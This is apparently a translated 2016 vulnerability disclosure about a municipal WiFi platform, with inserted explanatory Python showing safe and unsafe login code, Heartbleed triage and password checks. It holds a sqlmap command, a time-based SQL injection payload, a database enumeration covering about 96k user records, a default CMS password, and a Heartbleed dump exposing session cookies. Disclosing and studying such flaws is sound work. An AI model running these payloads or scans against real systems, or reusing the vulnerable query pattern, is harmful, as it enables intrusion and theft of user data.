
WiFi security: bundled vulnerabilities in a "wireless city" system (affecting 4,600+ wireless devices and ~90k user records)

2016-07-02 15:55

Seeing two senior guys go after the big vendors, I figured I'd give it a try too.

http://**.**.**.**/bugs/wooyun-2010-0206169

http://**.**.**.**/bugs/wooyun-2010-0204620

I downloaded the app; at the login form the username field threw an error, so I tried it and found SQL injection.



[screenshot: 1.jpg]



sqlmap command: sqlmap.py -r 1.txt --dbs

------------------------- POST request ----- userName parameter -----------

POST /JBaas/interfaceapp/checkLogin HTTP/1.1
Content-Length: 70
Content-Type: application/x-www-form-urlencoded
Host: **.**.**.**:8080
Connection: Keep-Alive
Accept-Encoding: gzip

passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98%27

----------------------------- payload ----------

Payload: passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98' AND (SELECT * FROM (SELECT(SLEEP(5)))FhhX)-- NInl
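What the request and payload above imply at the code level, as an added example that is not part of the original report: a login check that splices userName straight into the SQL text, next to the parameterized version that closes the hole, and the shape of a login handler that never returns database errors to the client (the error on the username field is what gave the injection away). Python's sqlite3 stands in for the MySQL backend, so the SLEEP()-based timing payload is not reproduced, only the single-quote probe from the request; the t_bus_member layout, the 'alice' row and the clear-text password column are assumptions made to keep the demo short.

```python
import logging
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's member table. The real schema behind
    /JBaas/interfaceapp/checkLogin is not on the page; the layout and the
    'alice' row are assumed (a real table would store a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_bus_member (userName TEXT, passWord TEXT)")
    conn.execute("INSERT INTO t_bus_member VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def check_login_vulnerable(conn, user_name: str, password: str) -> bool:
    """The defect class behind the report: user input is pasted into the SQL
    text, so a stray quote in userName reaches the SQL parser and anything
    after it (a comment marker, a SLEEP() subquery) is executed as SQL."""
    sql = ("SELECT COUNT(*) FROM t_bus_member "
           f"WHERE userName = '{user_name}' AND passWord = '{password}'")
    return conn.execute(sql).fetchone()[0] == 1


def check_login_fixed(conn, user_name: str, password: str) -> bool:
    """Parameterized statement: the driver ships the values separately from
    the SQL text, so a quote is just a character inside a string."""
    sql = "SELECT COUNT(*) FROM t_bus_member WHERE userName = ? AND passWord = ?"
    return conn.execute(sql, (user_name, password)).fetchone()[0] == 1


# The page's probe with %E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98%27 URL-decoded:
# the username 黑色键盘 followed by a single quote.
PROBE_USER = "黑色键盘'"
PROBE_PASS = "hddfjhddjfrh"


def probe(conn, login_fn, user_name: str, password: str) -> str:
    """Run one login function and report 'ok', 'denied', or the DB error it raised."""
    try:
        return "ok" if login_fn(conn, user_name, password) else "denied"
    except sqlite3.Error as exc:
        return f"db error: {exc}"


def probe_results() -> dict:
    """Same probe against both implementations; the vulnerable one errors out,
    the parameterized one simply finds no such user."""
    conn = make_db()
    return {
        "vulnerable": probe(conn, check_login_vulnerable, PROBE_USER, PROBE_PASS),
        "fixed": probe(conn, check_login_fixed, PROBE_USER, PROBE_PASS),
        "fixed_valid_user": probe(conn, check_login_fixed, "alice", "correct horse"),
    }


def login_endpoint(conn, user_name: str, password: str) -> dict:
    """Shape of a hardened checkLogin: parameterized lookup plus a generic
    failure message, so neither SQL syntax errors nor 'user exists' hints
    reach the client; the detail goes to the server log instead."""
    try:
        ok = check_login_fixed(conn, user_name, password)
    except sqlite3.Error:
        logging.exception("login query failed")  # detail stays server-side
        return {"success": False, "message": "login failed"}
    return {"success": ok, "message": "ok" if ok else "login failed"}


if __name__ == "__main__":
    for name, outcome in probe_results().items():
        print(f"{name:>16}: {outcome}")
```

Run the file directly to see the three outcomes side by side; the point of `login_endpoint` is that the response is identical for a wrong password, an unknown user and a malformed input, which removes the error oracle the reporter used.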



Database information

back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] information_schema
[*] jbaas
[*] mysql
[*] performance_schema
[*] radiusdb



Tables in the current database: about 96k member records and 4,614 AP devices

Database: jbaas
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| t_bus_app_device                | 96821   |
| t_bus_member                    | 96053   |
| t_bus_ap                        | 4614    |
| t_bus_app_log                   | 630     |
| t_portal_log                    | 114     |
| t_sys_acl                       | 105     |
| t_sys_dictionary                | 77      |
| t_sys_role_resource             | 49      |
| t_bus_market                    | 37      |
| t_portal_template               | 31      |
| t_sys_resource                  | 25      |
| t_bus_shop                      | 24      |
| t_bus_app_feedback              | 21      |
| t_bus_area                      | 20      |
| t_bus_vector                    | 19      |
| t_bus_ac                        | 16      |
| t_sys_unit                      | 15      |
| t_portal_template_content_tree  | 14      |
| t_portal_address                | 12      |
| t_portal_template_content       | 12      |
| t_portal_messageset             | 11      |
| t_portal_messagetemplate        | 10      |
| t_portal_template_tree          | 10      |
| t_bus_market_indoormap          | 8       |
| t_portal_strategy               | 8       |
| t_motor_config                  | 7       |
| t_bus_promotion                 | 6       |
| t_bus_goods                     | 5       |
| t_portal_advertisement          | 4       |
| t_portal_advertisement_and_list | 4       |
| t_portal_advertisement_list     | 4       |
| t_bus_app                       | 3       |
| t_portal_notice                 | 3       |
| t_sys_actor                     | 3       |
| t_bus_syn                       | 2       |
| t_portal_phone                  | 2       |
| t_sys_role                      | 2       |
| t_bus_app_config                | 1       |
+---------------------------------+---------+



This includes WiFi passwords and the like.



[screenshot: 2.png]



**.**.**.**/cms: logged in with test / 123456



[screenshot: 23.png]



One OpenSSL (heartbeat) issue

python openssl.py **.**.**.** | more

---------------------------------------------------
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 16384
... received message: type = 22, ver = 0302, length = 14397
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 48 54 4D 4C ....#.......HTML
00e0: 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 , like Gecko) Ch
00f0: 72 6F 6D 65 2F 33 38 2E 30 2E 32 31 32 35 2E 31 rome/38.0.2125.1
0100: 32 32 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 Safari/537.36
0110: 20 53 45 20 32 2E 58 20 4D 65 74 61 53 72 20 31 SE 2.X MetaSr 1
0120: 2E 30 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 .0..Referer: htt
0130: 70 73 3A 2F 2F 34 32 2E 36 32 2E 31 31 2E 36 32 ps://**.**.**.**
0140: 2F 62 69 67 44 61 74 61 2F 6F 73 2F 6D 61 69 6E /bigData/os/main
0150: 2E 70 68 70 3F 63 3D 6C 6F 67 75 73 65 72 26 61 .php?c=loguser&a
0160: 3D 66 72 61 6D 65 26 73 69 74 65 69 64 3D 35 37 =frame&siteid=57
0170: 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E ..Accept-Encodin
0180: 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65 0D g: gzip,deflate.
0190: 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 .Accept-Language
01a0: 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 : zh-CN,zh;q=0.8
01b0: 0D 0A 43 6F 6F 6B 69 65 3A 20 50 48 50 53 45 53 ..Cookie: PHPSES
01c0: 53 49 44 3D 61 66 62 37 38 62 61 33 33 37 39 37 SID=afb78ba33797
01d0: 36 63 61 34 34 64 39 31 36 30 32 62 35 31 37 66 6ca44d91602b517f
01e0: 33 35 35 30 0D 0A 0D 0A BA CF E8 6B 04 DC B3 2B 3550.......k...+
01f0: 9B F6 A2 F5 DE 3C 7E 41 32 F4 21 EC 03 03 03 03 .....<~A2.!.....
0200: 3D 6C 6F 67 3B 20 50 48 50 53 45 53 53 49 44 3D =log; PHPSESSID=
0210: 61 66 62 37 38 62 61 33 33 37 39 37 36 63 61 34 afb78ba337976ca4
0220: 34 64 39 31 36 30 32 62 35 31 37 66 33 35 35 30 4d91602b517f3550
0230: 0D 0A 0D 0A 72 73 9F 9D E6 64 96 EE 8F 35 75 6C ....rs...d...5ul
0240: A3 06 A9 80 3B 2F 1C AC 07 07 07 07 07 07 07 07 ....;/..........
0250: F0 C9 AA 0E 14 EC C0 42 F1 78 DF 98 36 98 51 AC .......B.x..6.Q.
0260: E4 17 58 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ..X.............
0270: 33 39 61 32 65 61 30 30 61 66 30 35 0D 0A 0D 0A 39a2ea00af05....
0280: 4E 3D 20 CF 76 95 0D 9D EB 6A C3 53 60 79 6F C8 N= .v....j.S`yo.
0290: 5E F1 CA BF 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ^...............
02a0: CB DA 28 9A F5 11 9E E1 3D 99 85 12 DD C4 97 47 ..(.....=......G
02b0: 37 63 64 62 30 66 65 66 61 65 31 37 66 62 34 66 7cdb0fefae17fb4f
02c0: 38 34 36 65 62 63 62 30 34 65 37 34 35 39 0D 0A 846ebcb04e7459..
02d0: 0D 0A FC 0F 13 20 24 95 5F 61 55 ED F1 80 DF 43 ..... $._aU....C
02e0: 1E 53 2B 62 07 E3 09 09 09 09 09 09 09 09 09 09 .S+b............
02f0: 5A 2E 42 F4 6E 98 81 E6 BF C5 5C 86 7E 24 01 86 Z.B.n.....\.~$..
0300: 44 13 AF D7 44 55 E8 AD 93 6D 34 9B 29 57 15 FB D...DU...m4.)W..
0310: C8 DC F4 AC C4 6B 4E 9C 0C 77 4B 06 06 06 06 06 .....kN..wK.....
0320: 37 BE 16 93 E0 32 3E 7A 51 CC 79 F3 2D 02 02 02 7....2>zQ.y.-...
0330: 07 E1 95 6F 3B 40 F2 94 07 07 07 07 07 07 07 07 ...o;@..........
0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................



[screenshot: 34.png]
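How to read the scanner output above, as an added example that is not part of the report and not the openssl.py script the author ran: it parses the "type = 22, ver = 0302, length = …" record lines into TLS content types, rebuilds bytes from the hexdump rows, reads the 3-byte heartbeat message header (RFC 6520: one type byte, two-byte payload_length), and judges the response the way a defender triaging a scan would. The test is the RFC rule itself: a compliant server echoes exactly the payload it received and silently discards a request whose declared length does not fit the record, so a response that claims 0x4000 bytes when the request carried almost nothing is the unchecked over-read known as Heartbleed. The sample lines are a constructed excerpt of the dump (rows 0000, 0010 and 00d0 to 0100), and the request's real payload size (0 bytes) is an assumption about the scanner.

```python
import re
import struct

# TLS record content types (RFC 5246 section 6.2.1; 24 = heartbeat, RFC 6520).
CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake",
                 23: "application_data", 24: "heartbeat"}
HEARTBEAT_TYPES = {1: "heartbeat_request", 2: "heartbeat_response"}

# Constructed excerpt of the scanner output and dump shown on the page.
SCANNER_LOG = """\
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 16384
... received message: type = 24, ver = 0302, length = 16384
"""

HEARTBEAT_DUMP = """\
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 48 54 4D 4C ....#.......HTML
00e0: 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 , like Gecko) Ch
00f0: 72 6F 6D 65 2F 33 38 2E 30 2E 32 31 32 35 2E 31 rome/38.0.2125.1
0100: 32 32 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 Safari/537.36
"""

RECORD_LINE = re.compile(r"type = (\d+), ver = ([0-9a-fA-F]{4}), length = (\d+)")
DUMP_LINE = re.compile(r"^\s*[0-9a-fA-F]+:\s+((?:[0-9a-fA-F]{2} ){16})")


def parse_record_lines(log: str) -> list:
    """Turn the scanner's record lines into dicts with a named content type."""
    records = []
    for m in RECORD_LINE.finditer(log):
        ctype, ver, length = int(m.group(1)), m.group(2), int(m.group(3))
        records.append({"type": ctype,
                        "name": CONTENT_TYPES.get(ctype, "unknown"),
                        "version": "TLS 1.1" if ver == "0302" else ver,
                        "length": length})
    return records


def parse_hexdump(dump: str) -> bytes:
    """Rebuild bytes from 'OFFSET: <16 hex pairs> <ascii>' rows (full rows only;
    the ASCII column is ignored because the regex stops after 16 pairs)."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)


def assess_heartbeat(data: bytes, request_payload_len: int) -> dict:
    """Read the HeartbeatMessage header and compare the declared payload_length
    with the payload the request actually carried. Any excess is memory the
    peer copied out without checking the length it was given."""
    if len(data) < 3:
        raise ValueError("heartbeat message shorter than its 3-byte header")
    declared = struct.unpack(">H", data[1:3])[0]   # big-endian uint16
    return {
        "message_type": HEARTBEAT_TYPES.get(data[0], "unknown"),
        "declared_payload_len": declared,
        "over_read_bytes": max(0, declared - request_payload_len),
        "vulnerable": declared > request_payload_len,
    }


def printable_runs(data: bytes, min_len: int = 4) -> list:
    """Collect printable-ASCII runs: the triage view of what kind of process
    memory surfaced (here a browser User-Agent fragment; further down the
    page's dump, request headers and session cookies of other users)."""
    runs, current = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E:
            current.append(b)
            continue
        if len(current) >= min_len:
            runs.append(current.decode("ascii"))
        current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs


if __name__ == "__main__":
    for rec in parse_record_lines(SCANNER_LOG):
        print(rec)
    payload = parse_hexdump(HEARTBEAT_DUMP)
    # Assumption: the scanner's heartbeat request carried no real payload bytes.
    print(assess_heartbeat(payload, request_payload_len=0))
    print(printable_runs(payload))
```

The remediation signal is `over_read_bytes`: after the OpenSSL upgrade a rescan should show either no type-24 record at all (heartbeat extension disabled) or a response whose declared length equals what was sent, and because session cookies were visible in the leaked memory, the session store and any credentials that transited that host should be rotated as part of the fix.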



Proof of vulnerability:


Fix:

Filter input; strengthen passwords.
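For the "strengthen passwords" half of the fix, an added example that is not from the report: a small credential-policy check of the kind a CMS login or account-provisioning path can run, which flags the sort of pair that opened the /cms console here. The default-pair list (beyond the page's own test / 123456), the 12-character minimum and the character-class rule are assumptions chosen for the demo.

```python
import re

# Constructed default/guessable pairs; test / 123456 is the page's real case,
# the others are common vendor defaults added for the demo.
KNOWN_DEFAULTS = {("test", "123456"), ("admin", "admin"),
                  ("admin", "123456"), ("root", "root")}
MIN_LENGTH = 12                       # assumed policy threshold
SEQUENCES = ("0123456789", "abcdefghijklmnopqrstuvwxyz",
             "qwertyuiopasdfghjklzxcvbnm")
CLASS_PATTERNS = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def credential_findings(username: str, password: str) -> list:
    """Return the policy rules a credential pair violates (empty = acceptable)."""
    findings = []
    user, pw = username.lower(), password
    if (user, pw) in KNOWN_DEFAULTS:
        findings.append("known default credential pair")
    if len(pw) < MIN_LENGTH:
        findings.append(f"shorter than {MIN_LENGTH} characters")
    if user and user in pw.lower():
        findings.append("contains the username")
    classes = sum(bool(re.search(rx, pw)) for rx in CLASS_PATTERNS)
    if classes < 3:
        findings.append("fewer than 3 character classes")
    if pw and any(pw.lower() in seq for seq in SEQUENCES):
        findings.append("keyboard or numeric sequence")
    return findings


def is_weak(username: str, password: str) -> bool:
    return bool(credential_findings(username, password))


def accounts_to_rotate(accounts: list) -> list:
    """Given (username, password) pairs from a provisioning list, return the
    usernames whose credentials must be reset before the account goes live."""
    return [u for u, p in accounts if is_weak(u, p)]


if __name__ == "__main__":
    # Constructed sample provisioning list.
    sample = [("test", "123456"), ("ops_admin", "Tq7!vLm2#rXw9"), ("portal", "portal2016")]
    for u, p in sample:
        print(u, credential_findings(u, p) or "ok")
    print("rotate:", accounts_to_rotate(sample))
```

The check is a gate, not a replacement for the rest of the fix: the /cms login also needs lockout or rate limiting on failed attempts and should not ship with any account whose password the vendor chose.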

Source: www.wooyun.org/bugs/wooyun-2016-0208629
